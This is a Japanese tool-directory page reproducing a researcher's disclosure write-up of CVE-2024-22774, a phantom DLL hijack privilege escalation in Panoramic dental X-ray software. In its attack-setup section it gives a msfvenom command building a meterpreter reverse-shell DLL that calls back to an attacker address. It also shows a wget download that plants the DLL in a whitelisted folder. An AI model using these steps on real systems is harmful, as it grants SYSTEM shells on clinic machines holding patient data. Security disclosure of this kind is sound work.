Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-22774 — パノラマ歯科画像ソフトウェアのステルス的な権限昇格脆弱性 | Kitploit
ツール/GitHubGitHub/gray-0men/cve-2024-22774
特権昇格ペイロード生成永続化メカニズム脆弱性分析エクスプロイトマルウェア分析ペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHubgray-0men/cve-2024-22774

CVE-2024-22774

パノラマ歯科画像ソフトウェアのステルス的な権限昇格脆弱性

142年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

パノラマ歯科画像ソフトウェア 9.1.2.7600 ファントムDLLハイジャック 権限昇格 (CVE-2024-22774)

目次

  • 目次
  • はじめに
  • ソフトウェアの最終バージョン
  • ハイジャック可能なDLLの検索
  • 攻撃のセットアップ
  • エクスプロイト
  • OSインストール後の永続性

はじめに

当初、これは歯科用X線装置ソフトウェアにおけるDLLプロキシングに関する記事になる予定でしたが、調査中に偶然あるDLLを見つけ、再確認した結果、権限昇格の脆弱性を発見し、CVEを取得しました。
私が技術者としてのキャリアの初期には、閉鎖される前のある歯科用X線装置メーカーでテクニカルサポートを担当していました。当時、現場で発生するバグを覚えており、そのソフトウェアに脆弱性がないか調べてみるのは良いアイデアだと考えていました。現在もそのソフトウェアが使用されているため、ソフトウェアサポートの仕事を離れた今、何か面白いことができないかと思い立ちました。少し前にサイバーセキュリティの勉強を始めた頃、そのソフトウェアにいくつかのハイジャック可能なDLLがあったのを覚えていて、DLLプロキシングを試し、ソフトウェアの機能を維持したまま悪意のあるDLLを実行できるか試してみることにしました(非常にステルス性が高い方法です)。以下はそのプロセスと、理論上OSのクリーンインストールや再インストール後も生き残る可能性のある権限昇格の脆弱性を偶然発見した経緯です。この情報がブルーチームの方々の役に立つことを願っています。

ソフトウェアの最終バージョン

注意すべき点は、このソフトウェアはもはやアップデートを受けていないことですが、現在でも米国内でX線装置が使用されているため、この脆弱性には依然として潜在的なリスクがあります。ソフトウェアはこちらからダウンロードでき、マニュアルはこちらにあります。もう一つの注意点は、このソフトウェアが使用されている場合、実行されるプロセスと以下の場所がほぼ確実に使用中のEDR/AVでホワイトリストに登録されていることです。このことはソフトウェアマニュアルの24ページにも記載されています。本稿では、同様にこれらの除外設定を追加し、すべての歯科医院でのインストール環境を再現します。

  1. C:\Program Files (x86)\Panoramic
  2. C:\ProgramData\Ajat

image

ハイジャック可能なDLLの検索

ソフトウェアのインストールと除外設定が完了したら、プロセスモニタを起動して検索を開始します。以下のフィルタを追加し、サービス内の「CCS Service」を再起動します。

  1. Process Name is ccsservice.exe を含める
  2. Path ends with .dll を含める

設定が反映されると、このソフトウェアにはハイジャック可能なDLLが多数存在することがわかります。同じDLLに対して「NAME NOT FOUND」と「SUCCESS」が異なる場所で連続して表示されるのが確認できます。ある日、プロキシングに適したDLLを探してスクロールしていると、ほぼ一番下まで来たところで目に留まるものがありました...

image

まさか...本当だ。これはSYSTEM権限で呼び出されるファントムDLLであり、その場所はユーザーが書き込み可能な領域です。 つまり、このDLLはプロキシングには適していません。なぜなら、マシン上のどこにも実際のDLLが存在しないため、Windowsは定義済みのフォルダセットを特定の順序で参照してDLLを呼び出そうとします。

  1. アプリケーションが読み込まれたディレクトリ
  2. システムディレクトリ
  3. 16ビットシステムディレクトリ
  4. Windowsディレクトリ
  5. カレントディレクトリ
  6. PATH環境変数にリストされたディレクトリ

今回のシナリオでは、5番目の場所は C:\ProgramData\Ajat\panoramic\datastor\lnrdlib.dll であり、この場所はすべてのユーザーに対して読み取り、書き込み、実行権限が与えられています。さらに、この場所は C:\ProgramData\Ajat\ の子フォルダであり、このソフトウェアが使用されているすべての環境でホワイトリストに登録されているはずです。

image

攻撃のセットアップ

このテストのネットワーク設定は以下の通りです。

  • Kali - 10.0.1.137
  • Windows 10 64x - 10.0.1.128

まず、標準的なバニラのmeterpreter DLLを作成します(AVを気にする必要はほとんどありません)。次に、転送用のHTTPサーバーを立ち上げます。

root@kitploit:~
## msfvenomでDLLを作成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.137 LPORT=443 -f dll > lnrdlib.dll

## pythonのhttpサーバー
python3 -m http.server 80

Windows側に戻り、標準ユーザーアカウントに切り替え、PowerShellを開いてdatastorフォルダに移動し、次を実行します。 wget http://10.0.1.137/lnrdlib.dll -outfile lnrdlib.dll

image

エクスプロイト

すべてが正しく行われていれば、エクスプロイトをトリガーするにはコンピュータを再起動するだけで十分です(通常のユーザーでも再起動は可能であり、CCS Serviceの再起動でもトリガーされます)。

image

成功!!!

OSインストール後の永続性

datastorの場所の重要な点は、コンピュータが何らかの理由でワイプまたは交換され、ソフトウェアが再インストールされる場合にバックアップすべき2つの場所のうちの1つであることです。calibフォルダの内容が失われると、技術者が来てX線装置の再較正を行う必要があります。datastorファイルが失われると、まだ保存されていない最新のX線画像が失われるため、この場所のバックアップはやや任意です。この場所にマルウェアが存在するため、バックアップされたdatastor(マルウェアと最近撮影されたX線画像が含まれている)の内容を新しいコンピュータに復元した場合、誤って再感染する可能性が理論上あります。このことはソフトウェアマニュアルの2ページに記載されています。

image

ツールをダウンロード